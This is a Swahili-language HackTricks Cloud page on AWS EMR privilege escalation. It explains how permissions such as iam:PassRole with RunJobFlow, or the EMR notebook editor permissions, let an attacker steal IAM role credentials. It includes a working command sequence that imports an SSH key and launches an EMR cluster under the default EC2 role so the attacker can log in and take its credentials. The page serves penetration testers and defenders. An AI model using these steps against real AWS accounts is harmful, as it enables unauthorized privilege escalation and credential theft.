HackTricks CloudAWS - EMR Privesc
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
EMR
More info about EMR in:
iam:PassRole, elasticmapreduce:RunJobFlow
Mshambuliaji mwenye ruhusa hizi anaweza kuendesha klasta mpya ya EMR akishikilia majukumu ya EC2 na kujaribu kuiba akidi zake.
Kumbuka kwamba ili kufanya hivi unahitaji kujua funguo za ssh zilizopitishwa kwenye akaunti au kuagiza moja, na uweze kufungua bandari 22 kwenye nodi kuu (unaweza kuwa na uwezo wa kufanya hivi kwa kutumia sifa EmrManagedMasterSecurityGroup na/au ServiceAccessSecurityGroup ndani ya --ec2-attributes).
# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key
aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc
# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances
Kumbuka jinsi EMR role inavyotajwa katika --service-role na ec2 role inavyotajwa katika --ec2-attributes ndani ya InstanceProfile. Hata hivyo, mbinu hii inaruhusu tu kuiba akidi za EC2 role (kama utajihusisha kupitia ssh) lakini si EMR IAM Role.
Athari Zinazoweza Kutokea: Privesc kwa EC2 service role iliyotajwa.
elasticmapreduce:CreateEditor, iam:ListRoles, elasticmapreduce:ListClusters, iam:PassRole, elasticmapreduce:DescribeEditor, elasticmapreduce:OpenEditorInConsole
Kwa ruhusa hizi, mshambuliaji anaweza kuingia kwenye AWS console, kuunda Notebook na kuipata ili kuiba IAM Role.
caution
Hata kama unachanganya IAM role na instance ya notebook katika majaribio yangu, niliona kwamba niliweza kuiba akidi za AWS zilizodhibitiwa na si akidi zinazohusiana na IAM role husika.
Athari Zinazoweza Kutokea: Privesc kwa AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
elasticmapreduce:OpenEditorInConsole
Kwa ruhusa hii pekee, mshambuliaji ataweza kufikia Jupyter Notebook na kuiba IAM role inayohusiana nayo.
URL ya notebook ni https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/
caution
Hata kama unachanganya IAM role na instance ya notebook katika majaribio yangu, niliona kwamba niliweza kuiba akidi za AWS zilizodhibitiwa na si akidi zinazohusiana na IAM role husika.
Athari Zinazoweza Kutokea: Privesc kwa AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.